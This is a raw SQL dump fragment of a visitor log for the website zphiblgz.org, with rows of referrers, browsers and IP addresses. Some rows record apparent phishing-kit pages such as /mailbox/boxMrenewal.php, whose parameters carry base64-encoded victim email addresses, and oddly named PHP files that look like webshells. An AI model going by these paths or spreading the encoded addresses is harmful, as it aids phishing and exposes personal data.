lgz.org','Firefox','Macintosh','21.0','','78.46.90.120','000',3,0),(16393,'2017-12-26','https://zphiblgz.org','Firefox','Linux','14.0.1','','78.46.90.120','000',1,0),(16394,'2017-12-26','https://zphiblgz.org','Safari','Macintosh','5.1.7','','78.46.90.120','000',1,0),(16395,'2017-12-26','https://zphiblgz.org','Safari','Macintosh','6.0','','78.46.90.120','000',1,0),(16396,'2017-12-26','https://zphiblgz.org','Firefox','Windows','14.0.1','','78.46.90.120','000',7,0),(16397,'2017-12-26','https://zphiblgz.org','Firefox','Windows','21.0','','78.46.90.120','000',9,0),(16398,'2017-12-26','https://zphiblgz.org','Chrome','Windows','27.0.1453.93','','78.46.90.120','000',1,0),(16399,'2017-12-26','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','78.46.90.120','000',1,0),(16400,'2017-12-26','https://zphiblgz.org','Firefox','Windows','18.0','','78.46.90.120','000',1,0),(16401,'2017-12-26','https://zphiblgz.org','Chrome','Windows','27.0.1453.94','','78.46.90.120','000',1,0),(16402,'2017-12-26','https://zphiblgz.org','Firefox','Windows','11.0','','78.46.90.120','000',3,0),(16403,'2017-12-26','https://zphiblgz.org','Chrome','Windows','25.0.1364.169','','78.46.90.120','000',2,0),(16404,'2017-12-26','https://zphiblgz.org','Safari','Windows','5.0.2','','78.46.90.120','000',1,0),(16405,'2017-12-26','https://zphiblgz.org','Chrome','Windows','26.0.1410.64','','78.46.90.120','000',1,0),(16406,'2017-12-26','https://zphiblgz.org','Safari','Macintosh','5.0.2','','78.46.90.120','000',1,0),(16407,'2017-12-26','https://zphiblgz.org','Chrome','Windows','23.0.1271.97','','78.46.90.120','000',1,0),(16408,'2017-12-26','https://zphiblgz.org','Firefox','Windows','19.0','','78.46.90.120','000',1,0),(16409,'2017-12-26','https://zphiblgz.org','Dalvik','Android','2.1.0','','90.221.54.161','000',2,0),(16410,'2017-12-26','https://glavtral.ru/','MSIE','Unknown','7.0b','','178.137.94.65','000',3,0),(16411,'2017-12-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.15','000',1,0),(16412,'2017-12-26','http://klin3952.ru/','MSIE','Windows','6.0','','188.163.78.30','000',1,0),(16413,'2017-12-26','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','97.74.24.7','000',2,0),(16414,'2017-12-26','https://zphiblgz.org','Safari','Macintosh','11.0.2','','128.229.4.2','000',9,0),(16415,'2017-12-26','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.151.39','000',3,0),(16416,'2017-12-26','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','108.87.106.56','000',2,0),(16417,'2017-12-26','https://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.119','000',1,0),(16418,'2017-12-26','https://zphiblgz.org','Internet','Linux','Unknown','','113.63.125.177','000',1,0),(16419,'2017-12-26','https://zphiblgz.org','IBrowse','iPhone','1.0','','104.130.207.163','000',1,0),(16420,'2017-12-26','https://zphiblgz.org','Flock','Unknown','11.5','','169.54.108.123','000',1,0),(16421,'2017-12-26','https://zphiblgz.org','Dragon','Linux','15.7','','110.77.181.175','000',1,0),(16422,'2017-12-26','https://zphiblgz.org','Internet','Unknown','Unknown','','13.127.16.95','000',1,0),(16423,'2017-12-26','https://zphiblgz.org','Firefox','Linux','7.16','','186.83.66.119','000',1,0),(16424,'2017-12-26','https://zphiblgz.org','IBrowse','Unknown','18.8','','177.131.16.158','000',1,0),(16425,'2017-12-26','https://zphiblgz.org','Seamonkey','Windows','12.2','','46.52.220.238','000',1,0),(16426,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','13.12','','137.74.168.174','000',1,0),(16427,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','13.12','','222.42.7.18','000',1,0),(16428,'2017-12-26','https://zphiblgz.org','Seamonkey','Unknown','18.14','','103.74.246.93','000',1,0),(16429,'2017-12-26','https://zphiblgz.org','Chrome','Linux','6.4','','139.130.67.98','000',1,0),(16430,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','13.12','','13.124.216.145','000',1,0),(16431,'2017-12-26','https://zphiblgz.org','Seamonkey','Unknown','18.14','','111.20.46.122','000',1,0),(16432,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','17.13','','111.20.46.125','000',1,0),(16433,'2017-12-26','74.220.219.51','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(16434,'2017-12-26','74.220.219.51','Firefox','Windows','33.0','','162.243.69.215','000',3,0),(16435,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','17.13','','122.183.242.54','000',1,0),(16436,'2017-12-26','https://zphiblgz.org','TenFourFox','Linux','12.11','','172.104.87.82','000',1,0),(16437,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','111.20.46.143','000',1,0),(16438,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','111.20.46.122','000',1,0),(16439,'2017-12-26','https://zphiblgz.org','Internet','Windows','Unknown','','103.243.25.158','000',1,0),(16440,'2017-12-26','https://zphiblgz.org','IBrowse','Unknown','18.8','','111.20.46.125','000',1,0),(16441,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','172.104.87.82','000',1,0),(16442,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','125.121.49.125','000',1,0),(16443,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','17.13','','89.236.17.106','000',1,0),(16444,'2017-12-26','https://zphiblgz.org','Internet','Windows','Unknown','','203.146.82.253','000',1,0),(16445,'2017-12-26','74.220.219.51','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(16446,'2017-12-26','https://zphiblgz.org','TenFourFox','Linux','12.11','','175.139.252.193','000',1,0),(16447,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','192.140.41.36','000',1,0),(16448,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','17.13','','116.199.2.197','000',1,0),(16449,'2017-12-26','https://zphiblgz.org','Netscape','Linux','13.15','','62.144.211.124','000',1,0),(16450,'2017-12-26','https://zphiblgz.org','Netscape','Linux','13.15','','151.217.68.28','000',1,0),(16451,'2017-12-26','https://zphiblgz.org','Netscape','Linux','13.15','','118.193.107.109','000',1,0),(16452,'2017-12-26','https://zphiblgz.org','Netscape','Linux','13.15','','46.52.220.238','000',1,0),(16453,'2017-12-26','https://zphiblgz.org','Netscape','Linux','13.15','','115.167.78.141','000',1,0),(16454,'2017-12-26','https://zphiblgz.org','Firefox','Windows','56.0','','64.150.191.73','000',1,0),(16455,'2017-12-26','https://zphiblgz.org','Safari','Macintosh','11.0','','64.150.191.73','000',1,0),(16456,'2017-12-26','https://zphiblgz.org','Firefox','Linux','8.18','','213.183.101.75','000',1,0),(16457,'2017-12-26','https://zphiblgz.org','Maxthon','Macintosh','8.5','','61.16.141.85','000',1,0),(16458,'2017-12-26','https://zphiblgz.org','Maxthon','Macintosh','8.5','','23.111.166.114','000',1,0),(16459,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','171.255.199.129','000',1,0),(16460,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','70.184.195.196','000',1,0),(16461,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','145.239.4.43','000',1,0),(16462,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','182.58.1.202','000',1,0),(16463,'2017-12-26','74.220.219.51','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(16464,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','46.209.135.109','000',1,0),(16465,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','118.193.107.28','000',1,0),(16466,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','197.232.17.83','000',1,0),(16467,'2017-12-26','https://zphiblgz.org','Konqueror','Windows','1.5','','89.227.214.114','000',1,0),(16468,'2017-12-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(16469,'2017-12-26','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(16470,'2017-12-26','https://zphiblgz.org','Safari','iPhone','11.0','','81.158.82.98','000',2,0),(16471,'2017-12-26','https://zphiblgz.org','Firefox','Linux','45.0','','85.185.45.174','000',4,0),(16472,'2017-12-26','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16473,'2017-12-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(16474,'2017-12-26','https://zphiblgz.org','Firefox','Windows','34.0','','85.115.224.215','000',1,0),(16475,'2017-12-26','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.97','','71.75.235.116','000',39,0),(16476,'2017-12-26','https://zphiblgz.org','Safari','iPhone','11.0','','71.75.235.116','000',4,0),(16477,'2018-01-06','https://zphiblgz.org','Firefox','Windows','40.1','','88.0.135.47','000',1,0),(16478,'2018-01-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','127.0.0.1','000',1,0),(16479,'2018-01-07','https://zphiblgz.org','Firefox','Linux','48.0','','134.249.48.162','000',1,0),(16480,'2018-01-07','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','63.149.124.133','000',5,0),(16481,'2018-01-07','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.5.190','000',4,0),(16482,'2018-01-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','64.71.204.4','000',1,0),(16483,'2018-01-07','https://zphiblgz.org','Go--client','Unknown','1.1','','103.70.5.72','000',12,0),(16484,'2018-01-07','https://zphiblgz.org','Chrome','Macintosh','56.0.2965.82','','134.249.48.162','000',2,0),(16485,'2018-01-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(16486,'2018-01-07','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(16487,'2018-01-07','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',1,0),(16488,'2018-01-07','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.7.6','000',10,0),(16489,'2018-01-07','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','178.137.87.251','000',3,0),(16490,'2018-01-07','https://www.google.com/','Safari','iPhone','11.0','','98.233.170.205','000',5,0),(16491,'2018-01-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.185.135','000',1,0),(16492,'2018-01-07','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(16493,'2018-01-07','https://zphiblgz.org','Go--client','Unknown','1.1','','94.23.194.117','000',12,0),(16494,'2018-01-07','https://zphiblgz.org','Chrome','Chrome OS','63.0.3239.116','','69.143.35.179','000',36,0),(16495,'2018-01-07','http://nalogovyykodeks.ru/','Opera','Windows','7.11','','178.137.87.251','000',3,0),(16496,'2018-01-07','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(16497,'2018-01-07','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.35.179','000',4,0),(16498,'2018-01-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','206.207.117.173','000',1,0),(16499,'2018-01-07','https://zphiblgz.org','Firefox','Linux','46.0','','134.249.48.162','000',1,0),(16500,'2018-01-07','https://www.google.co.jp/','Chrome','iPhone','63.0.3239.73','','49.98.85.130','000',2,0),(16501,'2018-01-07','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.185.92.237','000',1,0),(16502,'2018-01-07','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.185.100.75','000',1,0),(16503,'2018-01-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(16504,'2018-01-07','http://www.google.co.jp/','Chrome','Android','63.0.3239.111','','126.200.21.12','000',1,0),(16505,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.5.6','','209.19.181.143','000',1,0),(16506,'2018-01-08','https://www.google.com/','Chrome','Chrome OS','63.0.3239.116','','69.143.35.179','000',3,0),(16507,'2018-01-08','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.123','000',1,0),(16508,'2018-01-08','https://zphiblgz.org','Firefox','Windows','35.0','','178.46.162.83','000',2,0),(16509,'2018-01-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.6','000',1,0),(16510,'2018-01-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.12','000',1,0),(16511,'2018-01-08','https://zphiblgz.org','Firefox','Windows','4.0.1','','64.71.197.156','000',1,0),(16512,'2018-01-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16513,'2018-01-08','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.98','000',1,0),(16514,'2018-01-08','http://zphiblgz.org/scholarship/','MSIE','Windows','10.0','','216.218.222.12','000',1,0),(16515,'2018-01-08','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',1,0),(16516,'2018-01-08','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(16517,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.238.161.174','000',1,0),(16518,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','64.71.194.165','000',1,0),(16519,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','64.38.249.68','000',1,0),(16520,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.74.145.140','000',1,0),(16521,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.2.4.26','000',1,0),(16522,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.115.108.210','000',1,0),(16523,'2018-01-08','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.55.21','000',2,0),(16524,'2018-01-08','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.46.85','000',1,0),(16525,'2018-01-08','https://www.google.com/','Chrome','Windows','63.0.3239.84','','108.171.130.186','000',3,0),(16526,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.183.108','000',1,0),(16527,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16528,'2018-01-08','https://www.google.co.jp/','Safari','iPhone','11.0','','60.138.212.204','000',3,0),(16529,'2018-01-08','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.85','000',3,0),(16530,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',13,0),(16531,'2018-01-08','http://zphiblgz.org','AppleWebKit','Windows','530.0','','146.0.77.232','000',2,0),(16532,'2018-01-08','https://zphiblgz.org','Firefox','Windows','4.0','','202.56.255.50','000',1,0),(16533,'2018-01-08','https://zphiblgz.org/','Safari','iPhone','11.0','','69.143.35.179','000',4,0),(16534,'2018-01-08','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','72.81.215.41','000',9,0),(16535,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.190.233','000',1,0),(16536,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.26.193','000',17,0),(16537,'2018-01-08','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.8.6','000',1,0),(16538,'2018-01-08','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.6.4','000',1,0),(16539,'2018-01-08','http://zphiblgz.org/cache/hot18','Chrome','Windows','62.0.3202.94','','66.102.8.10','000',1,0),(16540,'2018-01-08','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','66.102.6.12','000',1,0),(16541,'2018-01-08','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.26.193','000',1,0),(16542,'2018-01-08','https://zphiblgz.org','MSIE','Windows','8.0','','95.108.149.136','000',1,0),(16543,'2018-01-08','http://zphiblgz.org/wp-content/plugins/index.lib.php','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(16544,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','193.226.177.45','000',3,0),(16545,'2018-01-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(16546,'2018-01-08','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(16547,'2018-01-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(16548,'2018-01-08','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','178.255.86.1','000',5,0),(16549,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.5.6','','209.19.181.162','000',1,0),(16550,'2018-01-08','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.185','000',1,0),(16551,'2018-01-08','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','23.101.126.141','000',1,0),(16552,'2018-01-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(16553,'2018-01-08','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','13.67.139.50','000',1,0),(16554,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.181.19','000',1,0),(16555,'2018-01-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(16556,'2018-01-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.68.69','000',1,0),(16557,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(16558,'2018-01-08','http://zphiblgz.org/download/constitution-by-laws/','Opera Next','Windows','43.0.2442.1144','','146.185.223.117','000',1,0),(16559,'2018-01-08','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.28','000',1,0),(16560,'2018-01-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(16561,'2018-01-08','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','73.226.45.32','000',2,0),(16562,'2018-01-08','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(16563,'2018-01-08','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(16564,'2018-01-08','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','198.20.69.98','000',2,0),(16565,'2018-01-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','64.71.194.66','000',1,0),(16566,'2018-01-08','https://zphiblgz.org','Chrome','Macintosh','35.0.1969.57','','104.227.54.158','000',2,0),(16567,'2018-01-08','https://zphiblgz.org','SamsungBrowser','Android','6.2','','80.195.244.28','000',2,0),(16568,'2018-01-08','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','198.20.69.98','000',1,0),(16569,'2018-01-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(16570,'2018-01-08','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(16571,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.5.6','','209.19.178.87','000',1,0),(16572,'2018-01-09','https://zphiblgz.org','Firefox','Windows','40.1','','79.173.205.141','000',2,0),(16573,'2018-01-09','https://zphiblgz.org','MSIE','Windows','8.0','','95.108.149.136','000',1,0),(16574,'2018-01-09','https://zphiblgz.org','wonderbot','Unknown','JS','','81.171.97.145','000',2,0),(16575,'2018-01-09','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(16576,'2018-01-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(16577,'2018-01-09','https://zphiblgz.org','Firefox','Windows','40.1','','93.56.124.19','000',2,0),(16578,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','206.80.115.123','000',1,0),(16579,'2018-01-09','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.28','000',1,0),(16580,'2018-01-09','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(16581,'2018-01-09','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(16582,'2018-01-09','http://zphiblgz.org/robots.txt','Firefox','Macintosh','47.0','','88.99.68.199','000',2,0),(16583,'2018-01-09','http://zphiblgz.org/robots.txt','Chrome','Linux','39.0.2178.84','','88.99.68.199','000',2,0),(16584,'2018-01-09','http://zphiblgz.org/robots.txt','Firefox','Linux','39.0','','88.99.68.199','000',2,0),(16585,'2018-01-09','http://zphiblgz.org/robots.txt','Chrome','Linux','47.0.2539.45','','88.99.68.199','000',2,0),(16586,'2018-01-09','http://zphiblgz.org/robots.txt','Chrome','Windows','52.0.2755.9','','88.99.68.199','000',2,0),(16587,'2018-01-09','http://zphiblgz.org/robots.txt','Firefox','Linux','48.0','','88.99.68.199','000',2,0),(16588,'2018-01-09','http://zphiblgz.org/','Edge','Macintosh','34.69495','','46.183.144.48','000',2,0),(16589,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','207.70.60.20','000',1,0),(16590,'2018-01-09','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(16591,'2018-01-09','https://zphiblgz.org/cache/hot18','Safari','iPhone','9.0','','46.101.94.163','000',2,0),(16592,'2018-01-09','http://zphiblgz.org/cache/hot18','Chrome','Windows','63.0.3239.84','','84.51.165.121','000',2,0),(16593,'2018-01-09','http://zphiblgz.org/cache/hot18','Chrome','Android','61.0.3116.0','','173.239.208.16','000',2,0),(16594,'2018-01-09','https://zphiblgz.org/cache/hot18','Chrome','Windows','63.0.3239.84','','139.59.4.194','000',2,0),(16595,'2018-01-09','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',22,0),(16596,'2018-01-09','https://zphiblgz.org','MSIE','Windows','8.0','','69.164.111.198','000',10,0),(16597,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.185.130','000',1,0),(16598,'2018-01-09','zphiblgz.org','Chrome','Windows','58.0.1145.75','','46.101.165.68','000',2,0),(16599,'2018-01-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16600,'2018-01-09','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','80.211.152.242','000',1,0),(16601,'2018-01-09','https://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(16602,'2018-01-09','https://zphiblgz.org','Firefox','Windows','40.1','','105.155.254.161','000',2,0),(16603,'2018-01-09','https://zphiblgz.org','Firefox','Windows','4.0.1','','206.80.118.124','000',1,0),(16604,'2018-01-09','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATO3ss8mK3y4KESuFaIcsvMgCe_YJmfewydQ-PBmo7CZSNgf2RxgzNhO6Xu9bp8aWqFcsAZh1DIwm0NR0eVsTc9coxBpupxS7xGgN5XD10PHFe9VDFI','AppleWebKit','iPhone','604.4.7','','172.56.3.64','000',3,0),(16605,'2018-01-09','https://www.google.com/','Chrome','Windows','63.0.3239.84','','73.172.1.175','000',7,0),(16606,'2018-01-09','https://www.google.com/','Chrome','Windows','63.0.3239.132','','173.233.57.214','000',6,0),(16607,'2018-01-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(16608,'2018-01-09','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(16609,'2018-01-09','https://zphiblgz.org','Firefox','Windows','40.1','','139.5.230.64','000',2,0),(16610,'2018-01-09','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.85','000',10,0),(16611,'2018-01-09','https://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.81.192','000',8,0),(16612,'2018-01-09','https://zphiblgz.org','Firefox','Windows','4.0.1','','209.19.170.60','000',1,0),(16613,'2018-01-09','https://zphiblgz.org','Firefox','Windows','21.0','','148.251.75.46','000',1,0),(16614,'2018-01-09','https://zphiblgz.org','Firefox','Windows','12.0','','5.9.145.132','000',1,0),(16615,'2018-01-09','https://zphiblgz.org','Safari','Macintosh','5.0.6','','88.99.27.172','000',1,0),(16616,'2018-01-09','http://www.ens-pbs1914.com/links/','MSIE','Windows','11.0','','147.248.63.22','000',1,0),(16617,'2018-01-09','http://zphiblgz.org/cache/hot18/','Safari','iPhone','11.0','','84.51.165.121','000',2,0),(16618,'2018-01-09','http://zphiblgz.org/cache/hot18/','Chrome','Windows','63.0.3239.84','','196.54.55.25','000',2,0),(16619,'2018-01-09','http://zphiblgz.org/cache/hot18/','Safari','iPhone','9.0','','78.129.137.28','000',1,0),(16620,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','209.19.181.32','000',1,0),(16621,'2018-01-09','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.51','000',2,0),(16622,'2018-01-09','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.42','000',1,0),(16623,'2018-01-09','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','50.201.151.83','000',8,0),(16624,'2018-01-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','175.209.160.176','000',8,0),(16625,'2018-01-09','https://www.google.com/','Chrome','Windows','63.0.3239.84','','189.85.81.132','000',2,0),(16626,'2018-01-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','64.71.196.93','000',1,0),(16627,'2018-01-09','https://www.google.com/','Chrome','Windows','63.0.3239.84','','197.251.230.4','000',2,0),(16628,'2018-01-09','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=ay5lbHZpbkBtYWl6by5jb20=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','5.196.1.129','000',1,0),(16629,'2018-01-09','https://zphiblgz.org/mailbox/x3d.php','MSIE','Windows','10.0','','62.212.73.141','000',1,0),(16630,'2018-01-09','https://zphiblgz.org/mailbox/boxMe.php','MSIE','Windows','10.0','','79.73.67.159','000',1,0),(16631,'2018-01-09','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.26','000',1,0),(16632,'2018-01-09','https://zphiblgz.org/mailbox/boxMe.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','185.163.1.11','000',1,0),(16633,'2018-01-09','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=eWlxYmFsQGVtYWFyLmFl&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','84.51.165.121','000',3,0),(16634,'2018-01-09','https://www.google.com/','Chrome','Windows','63.0.3239.108','','194.60.69.9','000',2,0),(16635,'2018-01-09','https://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','196.52.84.46','000',1,0),(16636,'2018-01-09','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','173.239.212.2','000',1,0),(16637,'2018-01-09','https://zphiblgz.org/cache/v12/index.php','MSIE','Windows','10.0','','89.163.155.202','000',1,0),(16638,'2018-01-09','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','5.199.130.127','000',1,0),(16639,'2018-01-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(16640,'2018-01-10','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(16641,'2018-01-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(16642,'2018-01-10','https://www.google.com/','Chrome','Windows','63.0.3239.84','','103.16.68.5','000',2,0),(16643,'2018-01-10','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.95','000',1,0),(16644,'2018-01-10','https://www.google.com/','Chrome','Windows','63.0.3239.84','','42.119.209.6','000',2,0),(16645,'2018-01-10','https://www.google.com/','Chrome','Windows','63.0.3239.84','','201.16.59.6','000',2,0),(16646,'2018-01-10','https://zphiblgz.org','Firefox','Windows','40.1','','156.197.87.137','000',2,0),(16647,'2018-01-10','https://www.google.com/','Chrome','Windows','63.0.3239.84','','31.209.137.5','000',2,0),(16648,'2018-01-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(16649,'2018-01-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(16650,'2018-01-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(16651,'2018-01-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(16652,'2018-01-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(16653,'2018-01-10','http://zphiblgz.org/members/wp-admin/images/xdrntpal.php','Firefox','Windows','43.0','','198.55.29.226','000',1,0),(16654,'2018-01-10','http://zphiblgz.org/Development/wp-includes/class-wp-post.php','Firefox','Windows','54.0','','160.153.146.158','000',1,0),(16655,'2018-01-10','http://zphiblgz.org/wp-content/ngg/modules/photocrati-frame_communication/uivugaoc.php','MSIE','Windows','11.0','','160.153.146.68','000',1,0),(16656,